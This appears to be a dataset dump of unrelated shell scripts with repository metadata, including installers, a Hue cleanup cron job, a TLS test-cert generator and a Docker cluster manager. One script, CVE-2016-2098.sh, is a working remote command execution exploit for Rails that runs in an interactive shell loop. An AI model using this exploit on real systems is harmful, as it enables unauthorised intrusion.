    elif [[ ${dist} == ubuntu ]]; then
        add-apt-repository ppa:qbittorrent-team/qbittorrent-stable -y
        apt-get install qbittorrent-nox -y
    else
        echo "fail"
    fi
    #useradd -r qbittorrent --shell=/usr/sbin/nologin
    cat > '/etc/systemd/system/qbittorrent.service' << EOF
[Unit]
Description=qBittorrent Daemon Service
Documentation=https://github.com/c0re100/qBittorrent-Enhanced-Edition
Wants=network-online.target
After=network-online.target nss-lookup.target
[Service]
Type=simple
User=root
RemainAfterExit=yes
ExecStart=/usr/bin/qbittorrent-nox --profile=/usr/share/nginx/
TimeoutStopSec=infinity
LimitNOFILE=65536
Restart=on-failure
RestartSec=3s
[Install]
WantedBy=multi-user.target
EOF
    systemctl daemon-reload
    systemctl enable qbittorrent.service
    # Create the profile/download/GeoIP tree. `-p` creates parents and makes
    # re-runs idempotent (the original plain mkdir failed after the first run).
    mkdir -p /usr/share/nginx/qBittorrent/downloads/
    mkdir -p /usr/share/nginx/qBittorrent/data/GeoIP/
    cd /usr/share/nginx/qBittorrent/data/GeoIP/
    curl -LO --progress-bar https://raw.githubusercontent.com/johnrosen1/vpstoolbox/master/binary/GeoLite2-Country.mmdb
    cd
    chmod 755 /usr/share/nginx/
    chown -R nginx:nginx /usr/share/nginx/
    systemctl restart qbittorrent.service
}
| true
|
5e199c1b3adbbc07389bf0f515aa625128f73f14
|
Shell
|
wate123/2d_game
|
/changeTime.sh
|
UTF-8
| 72
| 2.59375
| 3
|
[] |
no_license
|
#!/bin/bash
# Emit the current time as MMDDhhmmYYYY every 3 seconds, forever.
# BUGFIX: the original ran `$OUTPUT` as a command, i.e. it tried to execute
# the timestamp string itself, failing with "command not found" each loop.
# NOTE(review): this format matches `date MMDDhhmmYYYY` for *setting* the
# system clock — if that was the intent, use `date "$OUTPUT"` instead; confirm.
while true
do
    OUTPUT=$(date +%m%d%H%M%Y)
    printf '%s\n' "$OUTPUT"
    sleep 3s
done
| true
|
05d50c6bdb0cf04c47c661baf7dbc39fdfc393f8
|
Shell
|
Azariagmt/shell-practice-files
|
/ask
|
UTF-8
| 239
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
#read name and age
# Prompt for a name and age, then report whether the user is of voting and
# drinking age (>= 18).
echo "Please enter your name"
# -r keeps backslashes in the input literal.
read -r name
echo "and your age please!"
read -r age
# Quote $age so an empty answer cannot collapse the test; silence the
# "integer expression expected" noise for non-numeric input, which then
# falls through to the else branch.
if [ "$age" -ge 18 ] 2>/dev/null
then
	echo "Hello $name you can vote and drink now!"
else
	echo "Hello $name you are $age, still a bwabyy!"
fi
| true
|
d96d62dac1d03dfe95c8beb083e6b7e74874108f
|
Shell
|
cloudera/hue
|
/tools/ops/hue_history_cron.sh
|
UTF-8
| 4,093
| 3.359375
| 3
|
[
"CC-BY-3.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"ZPL-2.0",
"Unlicense",
"LGPL-3.0-only",
"CC0-1.0",
"LicenseRef-scancode-other-permissive",
"CNRI-Python",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-or-later",
"Python-2.0",
"GPL-3.0-only",
"CC-BY-4.0",
"LicenseRef-scancode-jpython-1.1",
"AFL-2.1",
"JSON",
"WTFPL",
"MIT",
"LicenseRef-scancode-generic-exception",
"LicenseRef-scancode-jython",
"GPL-3.0-or-later",
"LicenseRef-scancode-python-cwi",
"BSD-3-Clause",
"LGPL-3.0-or-later",
"Zlib",
"LicenseRef-scancode-free-unknown",
"Classpath-exception-2.0",
"LicenseRef-scancode-proprietary-license",
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"MPL-2.0",
"ISC",
"GPL-2.0-only",
"ZPL-2.1",
"BSL-1.0",
"Apache-2.0",
"LGPL-2.0-only",
"LicenseRef-scancode-public-domain",
"Xnet",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#  http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

#Cleans up old oozie workflow and beeswax savedqueries to
#prevent the DB from getting too large.

PARCEL_DIR=/opt/cloudera/parcels/CDH
LOG_FILE=/var/log/hue/`basename "$0" | awk -F\. '{print $1}'`.log
LOG_ROTATE_SIZE=10 #MB before rotating, size in MB before rotating log to .1
LOG_ROTATE_COUNT=2 #number of log files, so 20MB max
DATE=`date '+%Y%m%d-%H%M'`
KEEP_DAYS=7 #Number of days of beeswax and oozie history to keep

# Detect parcel vs package install layout.
if [ ! -d "/usr/lib/hadoop" ]
then
  CDH_HOME=$PARCEL_DIR
else
  CDH_HOME=/usr
fi

# Under Cloudera Manager, use the newest HUE process directory for config;
# otherwise fall back to the packaged /etc/hue/conf.
if [ -d "/var/run/cloudera-scm-agent/process" ]
then
  HUE_CONF_DIR="/var/run/cloudera-scm-agent/process/`ls -1 /var/run/cloudera-scm-agent/process | grep HUE | sort -n | tail -1 `"
else
  HUE_CONF_DIR="/etc/hue/conf"
fi

if [ -d "${CDH_HOME}/lib/hue/build/env/bin" ]
then
  COMMAND="${CDH_HOME}/lib/hue/build/env/bin/hue shell"
else
  COMMAND="${CDH_HOME}/share/hue/build/env/bin/hue shell"
fi

ORACLE_HOME=/opt/cloudera/parcels/ORACLE_INSTANT_CLIENT/instantclient_11_2/
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${ORACLE_HOME}

export CDH_HOME HUE_CONF_DIR ORACLE_HOME LD_LIBRARY_PATH COMMAND

# Feed the cleanup program to the Hue Django shell via a heredoc. The body is
# Python 2 (note the `except DatabaseError, e` syntax) and is intentionally
# left untouched here; it deletes old SavedQuery and trashed Workflow rows in
# batches, shrinking the batch size after repeated DB errors.
${COMMAND} >> /dev/null 2>&1 <<EOF
from beeswax.models import SavedQuery
from datetime import date, timedelta
from oozie.models import Workflow
from django.db.utils import DatabaseError
import logging
import logging.handlers
import sys

LOGFILE="${LOG_FILE}"
keepDays = ${KEEP_DAYS}
deleteRecords = 900
errorCount = 0

log = logging.getLogger('')
log.setLevel(logging.INFO)
format = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
fh = logging.handlers.RotatingFileHandler(LOGFILE, maxBytes=(1048576*${LOG_ROTATE_SIZE}), backupCount=${LOG_ROTATE_COUNT})
fh.setFormatter(format)
log.addHandler(fh)

log.info('HUE_CONF_DIR: ${HUE_CONF_DIR}')
log.info("Cleaning up anything in the Hue tables oozie*, desktop* and beeswax* older than ${KEEP_DAYS} old")

savedQuerys = SavedQuery.objects.filter(is_auto=True, mtime__lte=date.today() - timedelta(days=keepDays))
totalQuerys = savedQuerys.count()
loopCount = totalQuerys
deleteCount = deleteRecords
log.info("SavedQuerys left: %s" % totalQuerys)
log.info("Looping through querys")
while loopCount > 0:
  if loopCount < deleteCount:
    deleteCount = loopCount
  excludeCount = loopCount - deleteCount
  savedQuerys = SavedQuery.objects.filter(is_auto=True, mtime__lte=date.today() - timedelta(days=keepDays))[:excludeCount].values_list("id", flat=True)
  try:
    SavedQuery.objects.exclude(pk__in=list(savedQuerys)).delete()
    loopCount -= deleteCount
    errorCount = 0
    deleteCount = deleteRecords
  except DatabaseError, e:
    log.info("Non Fatal Exception: %s: %s" % (e.__class__.__name__, e))
    errorCount += 1
    deleteCount = 1
    if errorCount > 9:
      raise
  log.info("querys left: %s" % loopCount)

workflows = Workflow.objects.filter(is_trashed=True, last_modified__lte=date.today() - timedelta(days=keepDays))
totalWorkflows = workflows.count()
loopCount = 1
maxCount = 1000
log.info("Workflows left: %s" % totalWorkflows)
log.info("Looping through workflows")
for w in workflows:
  w.delete(skip_trash=True)
  loopCount += 1
  if loopCount == maxCount:
    totalWorkflows = totalWorkflows - maxCount
    loopCount = 1
    log.info("Workflows left: %s" % totalWorkflows)
EOF
| true
|
59a8feff9eccc0f36e4f15ed1a7cde96d87e9f37
|
Shell
|
httplib2/httplib2
|
/script/generate-tls
|
UTF-8
| 2,232
| 3.640625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Generate a self-signed test PKI for the httplib2 test suite: a CA, a client
# cert (plain and AES-encrypted key), and a server cert for $server_cn,
# written into the target directory given as $1 (default: cwd).
set -eu
target_dir="${1:-.}"
days=7300
rsa_bits=2048
org="httplib2-test"
server_cn="localhost"
subj_prefix="/C=ZZ/ST=./L=./O=$org/OU=."

main() {
  cd "$target_dir"
  gen
  check
}

# Sanity-check the generated material: keys are well-formed and no cert
# expires within the next hour.
check() {
  echo "- check keys" >&2
  openssl rsa -in ca.key -check -noout
  openssl rsa -in client.key -check -noout
  openssl rsa -in client_encrypted.key -check -noout -passin pass:12345
  openssl rsa -in server.key -check -noout
  echo "- check certs" >&2
  for f in *.pem ; do
    openssl x509 -in "$f" -checkend 3600 -noout
  done
}

# Create keys (reusing existing ones), then issue CA, client, and server
# certificates; the *.pem bundles concatenate cert + key (+ CA for chains).
gen() {
  echo "- generate keys, if absent" >&2
  [[ -f ca.key ]] || openssl genrsa -out ca.key $rsa_bits
  [[ -f client.key ]] || openssl genrsa -out client.key $rsa_bits
  [[ -f client_encrypted.key ]] || openssl rsa -in client.key -out client_encrypted.key -aes128 -passout pass:12345
  [[ -f server.key ]] || openssl genrsa -out server.key $rsa_bits

  echo "- generate CA" >&2
  # ca_unused.pem shares the key but is never used to sign — presumably for
  # negative trust tests; confirm against the test suite.
  openssl req -batch -new -nodes -x509 -days $days -subj "$subj_prefix/CN=$org-CA" -key ca.key -out ca.pem
  openssl req -batch -new -nodes -x509 -days $days -subj "$subj_prefix/CN=$org-CA-unused" -key ca.key -out ca_unused.pem

  echo "- generate client cert" >&2
  openssl req -batch -new -nodes -out tmp.csr -key client.key -subj "$subj_prefix/CN=$org-client"
  openssl x509 -req -in tmp.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out client.crt -days $days -serial -fingerprint
  cat client.crt client.key >client.pem
  cat client.crt ca.pem client.key >client_chain.pem

  echo "- generate encrypted client cert" >&2
  openssl req -batch -new -nodes -out tmp.csr -key client_encrypted.key -passin pass:12345 -subj "$subj_prefix/CN=$org-client-enc"
  openssl x509 -req -in tmp.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out client_encrypted.crt -days $days -serial -fingerprint
  cat client_encrypted.crt client_encrypted.key >client_encrypted.pem

  echo "- generate server cert" >&2
  openssl req -batch -new -nodes -out tmp.csr -key server.key -subj "$subj_prefix/CN=$server_cn"
  openssl x509 -req -in tmp.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out server.crt -days $days -serial -fingerprint
  cat server.crt server.key >server.pem
  cat server.crt ca.pem server.key >server_chain.pem

  rm tmp.csr
}

main
| true
|
4ddd18dc824f792b1b8b0651b6f0a8e835f402a3
|
Shell
|
ajprax/bento-cluster
|
/bin/bento
|
UTF-8
| 11,035
| 3.859375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# -*- coding: utf-8 -*-
# -*- mode: shell -*-
# (c) Copyright 2014 WibiData, Inc.
#
# See the NOTICE file distributed with this work for additional
# information regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
set -o nounset   # Fail when referencing undefined variables
set -o errexit   # Script exits on the first error
set -o pipefail  # Pipeline status failure if any command fails

# With DEBUG set in the environment, trace every command, prefixing each
# trace line with "scriptname:lineno".
if [[ ! -z "${DEBUG:-}" ]]; then
  source=$(basename "${BASH_SOURCE}")
  PS4="# ${source}":'${LINENO}: '
  set -x
fi
# ------------------------------------------------------------------------------
# Canonicalize a path into an absolute, symlink free path.
#
# Portable implementation of the GNU coreutils "readlink -f path".
# The '-f' option of readlink does not exist on MacOS, for instance.
#
# Args:
# param $1: path to canonicalize.
# Stdout:
# Prints the canonicalized path on stdout.
function resolve_symlink() {
  local target_file=$1
  # Empty input canonicalizes to the empty string.
  if [[ -z "${target_file}" ]]; then
    echo ""
    return 0
  fi
  # NOTE: this function runs in the caller's shell and changes the current
  # directory as a side effect — callers invoke it inside $( ) subshells.
  cd "$(dirname "${target_file}")"
  target_file=$(basename "${target_file}")
  # Iterate down a (possible) chain of symlinks
  local count=0
  while [[ -L "${target_file}" ]]; do
    if [[ "${count}" -gt 1000 ]]; then
      # Just stop here, we've hit 1,000 recursive symlinks. (cycle?)
      break
    fi
    # Follow one link, then hop into its directory so relative link
    # targets resolve correctly.
    target_file=$(readlink "${target_file}")
    cd $(dirname "${target_file}")
    target_file=$(basename "${target_file}")
    count=$(( ${count} + 1 ))
  done
  # Compute the canonicalized name by finding the physical path
  # for the directory we're in and appending the target file.
  local phys_dir=$(pwd -P)
  echo "${phys_dir}/${target_file}"
}
# ------------------------------------------------------------------------------
bento_bin_path="${BASH_SOURCE:-$0}"
bento_bin_path=$(resolve_symlink "${bento_bin_path}")
BENTO_CLUSTER_HOME=$(dirname "$(dirname "${bento_bin_path}")")
BENTO_CLUSTER_HOME=$(cd "${BENTO_CLUSTER_HOME}"; pwd -P)
# ------------------------------------------------------------------------------
# Print the command-line help text on stdout.
function print_tool_usage() {
  # A single quoted heredoc replaces the long chain of echo statements;
  # the text is emitted verbatim, with no expansion.
  cat <<'EOF'
The bento script can start and stop Docker containers containing HDFS, YARN, ZooKeeper,
HBase and Cassandra services

USAGE

  bento (create|start|stop|status|list|rm)

COMMANDS

  help     - Displays this help message. Use --verbose for more information.
  create   - Create and start a new Bento container.
  start    - Start a Bento container.
  stop     - Stop a Bento container.
  status   - Display the status of a Bento container.
  list     - List all Bento containers.
  rm       - Deletes a Bento container and all data.
  ip       - Get the ip address of a Bento container.
  hostname - Get the host name of a Bento container.
  build    - Build a new local Bento image for image development.
  pull     - Pull the latest Bento image from docker hub.
  logs     - Tail the Bento process logs.
  config   - Dump config files in specified directory.

FLAGS (following the command)
  all
    -n     Specify a container name. Defaults to 'bento'. The provided
           name will be appended to 'bento-' to create the container name.
  create
    -f     Create container in foreground (will attach stdin/tty).
    -r     Remove the container on stop. Will start container in foreground.
    -h     Do not modify environment for bento hostname resolution.
    -c     Do not overwrite Hadoop & HBase client configuration.
    -o     Directory to dump config files in.
  start
    -h     Do not modify environment for bento hostname resolution.
    -c     Do not overwrite Hadoop & HBase client configuration.
    -o     Directory to dump config files in.
  list
    -a     List all running and stopped Bento containers.
  config
    -o     Directory to dump config files in.
EOF
}
# ------------------------------------------------------------------------------
# Script main begins here:
if [[ -z ${1:-} ]]; then
  print_tool_usage
  exit 0
fi

# Locate the Docker binary:
# Ubuntu installs the docker binary as docker.io to avoid a conflict with another package:
# ('command -v' replaces the external, non-portable 'which'.)
if docker=$(command -v "docker.io"); then :
elif docker=$(command -v "docker"); then :
else
  echo "Docker command-line tool not found : please install Docker."
  exit 1
fi

# Ensure that Docker version is not less than 1.0.0.
docker_version=$($docker version | head -1 | cut -f 3 -d " ")
# BUG FIX: '[[ a < b ]]' compares lexicographically, which mis-orders
# versions such as 1.10.0 vs 1.9.0. Use a version-aware comparison instead:
# if the smaller of {found, 1.0.0} under 'sort -V' is not 1.0.0, the found
# version is older than 1.0.0.
if [[ "$(printf '%s\n' "${docker_version}" '1.0.0' | sort -V | head -n 1)" != "1.0.0" ]]; then
  echo "Docker version should be 1.0.0 or above. Found version $docker_version." 1>&2
  exit 1
fi
command=$1
shift # pop off the command

# Defaults for the per-command flags parsed below.
container_name=bento      # docker container name ('bento-<suffix>' with -n)
daemon='-d'               # run detached unless -f / -r is given
edit_hosts=true           # update hosts/HOSTALIASES for the container name
remove=""                 # pass --rm=true to docker run when -r is given
client_config=true        # write local Hadoop/HBase client configs
all=''                    # pass -a to 'docker ps' when listing
client_config_dir=$BENTO_CLUSTER_HOME/client-conf

# BUG FIX: 'c' was documented in the usage text and handled in the case arm
# below, but it was missing from the optstring (which also contained stray
# spaces), so '-c' was always rejected as an unknown option.
while getopts ":fhn:rca:o:" opt; do
  case $opt in
    f)
      daemon='-it'
      edit_hosts=false
      client_config=false
      ;;
    h)
      edit_hosts=false
      ;;
    n)
      container_name="bento-${OPTARG}"
      ;;
    r)
      remove='--rm=true'
      daemon='-it'
      edit_hosts=false
      client_config=false
      ;;
    c)
      client_config=false
      ;;
    a)
      all='-a'
      ;;
    o)
      client_config_dir="${OPTARG}"
      ;;
    \?)
      echo "Unknown option: -${OPTARG}" >&2
      ;;
  esac
done
shift $((OPTIND-1))
# Render local Hadoop & HBase client configuration files pointing at the
# running Bento container, by substituting its hostname into the templates.
# Reads: container_name, client_config, client_config_dir, BENTO_CLUSTER_HOME.
function set_client_conf() {
  HOST=$($docker inspect --format="{{.Config.Hostname}}" ${container_name})
  if [[ "$client_config" == true ]]; then
    echo "Adding address to Bento container '${container_name}' to local Hadoop & HBase client configurations." 1>&2
    mkdir -p $client_config_dir/hadoop
    mkdir -p $client_config_dir/hbase
    echo "Writing client configuration files to ${client_config_dir} ..." 1>&2
    # Each template contains the placeholder $BENTO_HOST, replaced here with
    # the container's hostname.
    sed "s/\$BENTO_HOST/$HOST/" $BENTO_CLUSTER_HOME/client-conf-template/core-site.xml > \
      $client_config_dir/hadoop/core-site.xml
    sed "s/\$BENTO_HOST/$HOST/" $BENTO_CLUSTER_HOME/client-conf-template/mapred-site.xml > \
      $client_config_dir/hadoop/mapred-site.xml
    sed "s/\$BENTO_HOST/$HOST/" $BENTO_CLUSTER_HOME/client-conf-template/yarn-site.xml > \
      $client_config_dir/hadoop/yarn-site.xml
    sed "s/\$BENTO_HOST/$HOST/" $BENTO_CLUSTER_HOME/client-conf-template/hbase-site.xml > \
      $client_config_dir/hbase/hbase-site.xml
  else
    echo "Not adding address to Bento container '${container_name}' to local Hadoop & HBase client configurations." 1>&2
  fi
}
# Make the Bento container's hostname resolvable from the host machine.
# Reads: edit_hosts, ADDRESS, HOST, BENTO_CLUSTER_HOME.
function update_hostname_resolution() {
  # Guard clause: skip entirely when hostname editing was disabled via flags.
  if [[ "$edit_hosts" != true ]]; then
    echo "Not adding container address and host to enviroment:" 1>&2
    return 0
  fi
  # Linux environments obey the HOSTALIASES environment variable.
  # Other environments are required to modify /etc/hosts.
  if [[ $(uname) == "Linux" ]]; then
    echo "Adding Bento docker container host name to ${HOSTALIASES}." 1>&2
    $BENTO_CLUSTER_HOME/bin/update-user-hosts $ADDRESS $HOST
  else
    echo "Adding container address and host to /etc/hosts:" 1>&2
    $BENTO_CLUSTER_HOME/bin/update-etc-hosts $ADDRESS $HOST
  fi
}
# Dispatch on the sub-command parsed above. Container state is queried via
# 'docker inspect'; informational messages go to stderr so that stdout stays
# machine-friendly for commands such as 'ip' and 'hostname'.
case ${command} in
  help)
    print_tool_usage
    exit 0
    ;;
  create)
    # Create and start a new container; remaining args are passed through
    # to the image entry point.
    $docker run ${daemon} ${remove} --hostname ${container_name} --name ${container_name} kijiproject/bento-cluster $@
    printf "Bento container '" 1>&2
    printf ${container_name}
    printf "' created and started." 1>&2
    printf "\n"
    ADDRESS=$($docker inspect --format="{{.NetworkSettings.IPAddress}}" ${container_name})
    HOST=$($docker inspect --format="{{.Config.Hostname}}" ${container_name})
    update_hostname_resolution
    set_client_conf
    ;;
  start)
    # Start only if the container exists and is not already running.
    if status=$($docker inspect --format="{{.State.Running}}" ${container_name} 2> /dev/null); then
      if [[ $status == 'true' ]]; then
        echo "Bento container '${container_name}' is already started." 1>&2
        exit 1;
      else
        $docker start ${container_name} > /dev/null
        printf "Bento container '" 1>&2;
        printf ${container_name}
        printf "' started." 1>&2;
        printf "\n"
        ADDRESS=$($docker inspect --format="{{.NetworkSettings.IPAddress}}" ${container_name})
        HOST=$($docker inspect --format="{{.Config.Hostname}}" ${container_name})
        update_hostname_resolution
        set_client_conf
        echo "Visit http://${HOST}:9001 to see the running services." 1>&2
        echo "Useful Links:" 1>&2
        echo " HDFS: http://${HOST}:50070" 1>&2
        echo " HBase Master: http://${HOST}:60010" 1>&2
        echo " YARN Resource Manager: http://${HOST}:8088" 1>&2
        echo " DataStax OpsCenter : http://${HOST}:8888" 1>&2
      fi
    else
      echo "Bento container '${container_name}' does not exist." 1>&2
      exit 1;
    fi
    ;;
  stop)
    $docker stop ${container_name} > /dev/null
    echo "Bento container '${container_name}' stopped."
    ;;
  rm)
    # Deletes the container and all of its data.
    $docker rm ${container_name} > /dev/null
    echo "Bento container '${container_name}' removed."
    ;;
  status)
    if status=$($docker inspect --format="{{.State.Running}}" ${container_name} 2> /dev/null); then
      printf "Bento container " 1>&2
      if [[ $status == 'true' ]]; then
        printf "started"
      else
        printf "stopped"
      fi
      printf "." 1>&2
      printf "\n"
    else
      echo "Bento container '${container_name}' does not exist."
      exit 1;
    fi
    ;;
  list)
    # Keep the 'docker ps' header row plus any bento-cluster containers.
    $docker ps $all | awk 'NR==1 || /kijiproject\/bento/'
    ;;
  ip)
    echo $($docker inspect --format="{{.NetworkSettings.IPAddress}}" ${container_name})
    ;;
  hostname)
    echo $($docker inspect --format="{{.Config.Hostname}}" ${container_name})
    ;;
  build)
    # Build a local image from the bundled Dockerfile (image development).
    $docker build -t "kijiproject/bento-cluster" ${BENTO_CLUSTER_HOME}/docker
    ;;
  pull)
    $docker pull kijiproject/bento-cluster
    ;;
  logs)
    $docker logs -f ${container_name}
    ;;
  config)
    # Re-dump the client configuration for a running container.
    if status=$($docker inspect --format="{{.State.Running}}" ${container_name} 2> /dev/null); then
      set_client_conf
    else
      echo "Bento container '${container_name}' does not exist."
      exit 1;
    fi
    ;;
  *)
    echo "Unknown command: ${command}"
    print_tool_usage
    exit 1
    ;;
esac
| true
|
97ef08b3830f8e6c35f72c9b9bd2c72052f57fff
|
Shell
|
kkellner/certbot-dns
|
/pipeline/setpipeline.sh
|
UTF-8
| 547
| 3.296875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Register ('set') and unpause the generate-cert pipeline on the Concourse
# target named by the fly_target environment variable.
set -eu
pipeline_name="generate-cert"
# fly_target must name a pre-configured 'fly' login target.
if [ -z ${fly_target:-} ]; then echo "need to set fly_target environment variable"; exit 1; fi
# Directory containing this script (and pipeline.yml / params.yml).
DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
export fly_target=${fly_target}
echo "Concourse API target ${fly_target}"
echo "Location: $(basename $DIR)"
pushd $DIR
fly -t ${fly_target} set-pipeline -p ${pipeline_name} -c pipeline.yml -l params.yml
fly -t ${fly_target} unpause-pipeline -p ${pipeline_name}
# fly -t ${fly_target} trigger-job -w -j ${pipeline_name}/generate-cert
popd
| true
|
bbba009434d2bbd9474fa4f871e7556235887bda
|
Shell
|
0ldMate/PentestingStuff
|
/tools/ptl/bash/CVE-2016-2098.sh
|
UTF-8
| 563
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# PoC for CVE-2016-2098 (Rails Action Pack 'render inline' code execution).
# Prompts for commands and runs each on the target via a crafted payload
# until the user types 'exit'.
echo '[+] CVE-2016-2098 POC'
# Require host, URI and an initial command.
if [ -z "$3" ]
then
  echo '[-] USAGE: /bin/bash' "$0" '<host> <URI> <cmd>'
  echo '[~] Example: /bin/bash' "$0" '"http://target.com" "pages?id" "whoami"'
  # 'exit -1' is non-portable (exit takes 0-255); any non-zero status works.
  exit 1
fi
host=$1
uri=$2
cmd=$3
while [ "$cmd" != 'exit' ]
do
  echo "[+] Executing $cmd on $host"
  # URL-encode spaces before embedding the command in the payload.
  cmd=$(echo "$cmd" | sed 's/ /%20/g')
  # -g disables curl's own globbing so the [inline] brackets pass through.
  curl -i "$host/$uri[inline]=%3C%25=%20%25x($cmd)%20%25%3E" -g
  echo
  # -r keeps backslashes in the typed command literal.
  read -r -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'
| true
|
2b79f53d2933c8aa9dd1d77d4af5c72812cd6c75
|
Shell
|
xiaoluo260/gluster
|
/file_life_cycle/install.sh
|
UTF-8
| 316
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Install the file_life_cycle service: copy the program tree to /opt,
# register its systemd unit, and install the updatedb (locate) config.
cd `dirname $0`
if [ -d "/opt/" ];then
  \cp -rf ../file_life_cycle /opt/
fi
# Install the file_life_cycle systemd unit (only if not already present).
if [ ! -e "/etc/systemd/system/file_life_cycle.service" ];then
  \cp -f ./script/file_life_cycle.service /etc/systemd/system/
fi
# Install the updatedb (locate) configuration, overwriting the system copy.
\cp -f ./src/config/updatedb.conf /etc/updatedb.conf
| true
|
a55183e1d40cd0d5216e60ae776097c81c17504a
|
Shell
|
sandprickle/misc
|
/bin/favorite-wallpaper
|
UTF-8
| 1,369
| 4.03125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash

# Filename:      favorite-wallpaper
# Description:   Marks/unmarks wallpapers as favorite.
# Maintainer:    Jeremy Cantrell <jmcantrell@gmail.com>
# Last Modified: Sun 2010-10-03 02:57:01 (-0400)

# I wrote this script as a helper for my wallpaper manager, Wally, but I
# suppose it could be useful for others.

# IMPORTS {{{1

# Helper libraries from the 'bashful' collection (input prompts, messages,
# usage/mode handling, misc utilities such as 'truth').
source bashful-input
source bashful-messages
source bashful-modes
source bashful-utils

# FUNCTIONS {{{1

# Return 0 when the given wallpaper carries the 'favorite' tag, 1 otherwise.
is_favorite() #{{{2
{
    wallpaper-tags -l "$1" | grep -q '^favorite$' && return 0
    return 1
}

# VARIABLES {{{1

SCRIPT_NAME=$(basename "$0" .sh)
SCRIPT_ARGUMENTS="[WALLPAPER...]"
SCRIPT_USAGE="Marks/unmarks wallpapers as favorite."
SCRIPT_OPTIONS="-r    Remove wallpaper(s) from favorites."

# COMMAND-LINE OPTIONS {{{1

unset OPTIND
while getopts ":hr" option; do
    case $option in
        r) REMOVE=1 ;;
        h) usage 0 ;;
        *) usage 1 ;;
    esac
done && shift $(($OPTIND - 1))

#}}}1

# Each positional argument is a wallpaper to (un)favorite; each action is
# confirmed interactively via bashful's 'question'.
for w in "$@"; do
    # Make sure it's an absolute path
    w=$(readlink -f "$w")
    if truth $REMOVE; then
        is_favorite "$w" || continue
        question -p "Remove wallpaper '$w' from favorites?" || continue
        wallpaper-tags -r -t favorite "$w"
    else
        is_favorite "$w" && continue
        question -p "Add wallpaper '$w' to favorites?" || continue
        wallpaper-tags -a -t favorite "$w"
    fi
done
| true
|
fc44b66be6d7bb3b2158601e9bfb8336f3d76429
|
Shell
|
aabmass/aabmass.github.io
|
/deploy-ghpages.sh
|
UTF-8
| 354
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Build the Ember app and publish ./dist into the gh-pages checkout that
# lives in pub-branch/.

# BUG FIX: abort on the first failed command. Without this, a failed
# 'cd pub-branch' left us in the project root, where the following
# 'rm -rf *' would delete the sources.
set -e

# cd to the directory of this script
cd "$(dirname "$0")"
rm -rf dist/ tmp/
ember build -prod
cd pub-branch
git checkout master
# Replace the published tree with the fresh build output.
rm -rf *
cp -R ../dist/* .
git add -A
# starts with the -m message than opens the editor
git commit -m "Deployed on $(date)" -e
git push
# BUG FIX: return to the project root first — the cleanup below is meant for
# the project's dist/tmp (see comment), but previously ran inside pub-branch.
cd ..
# need to delete these afterwards or ember server fails
rm -rf dist/ tmp/
| true
|
eafc150dac1fcedb2741c22f2532ed56e9a3fb95
|
Shell
|
joeljosephmamalssery/shellScript
|
/break.sh
|
UTF-8
| 103
| 3.109375
| 3
|
[] |
no_license
|
# Print the integers 0 through 6, stopping the loop when the counter
# reaches 7.
a=0
while [ "$a" -lt 10 ]
do
  if [ "$a" -eq 7 ]
  then
    break
  else
    echo "$a"
    # Arithmetic expansion replaces the slow external 'expr' call.
    a=$((a + 1))
  fi
done
| true
|
be0a21eb301662b7f5527c5c9517ff80c8576a76
|
Shell
|
katyhuff/tools
|
/env/bash_profile
|
UTF-8
| 1,651
| 2.921875
| 3
|
[] |
no_license
|
# Load interactive shell settings shared with .bashrc.
source ~/.bashrc

# Amazon EC2 command-line tools.
export EC2_HOME=~/.ec2
# BUG FIX: the '$' was missing, so the literal string "EC2_HOME/bin" was
# appended to PATH instead of the tools directory.
PATH=${PATH}:${EC2_HOME}/bin
export JAVA_HOME=/System/Library/Frameworks/JavaVM.framework/Home/

# Keep Intel MKL single-threaded.
MKL_NUM_THREADS=1
export MKL_NUM_THREADS

##
# Your previous /Users/khuff/.bash_profile file was backed up as /Users/khuff/.bash_profile.macports-saved_2010-12-24_at_20:11:48
##

# MacPorts Installer addition on 2010-12-24_at_20:11:48: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.

# This is where Katy has added stuff by herself...
HDF5_ROOT="/opt/local/lib"
export HDF5_ROOT

# BUG FIX: the path was missing its leading '/', so it pointed at a relative
# "Users/khuff/..." directory (macOS home directories live under /Users).
CYCLUS_SRC_DIR="/Users/khuff/repos/cyclus/src"
export CYCLUS_SRC_DIR

## This makes the terminal tell me where I am in git
parse_git_branch() {
  git branch 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/(\1)/'
}

##
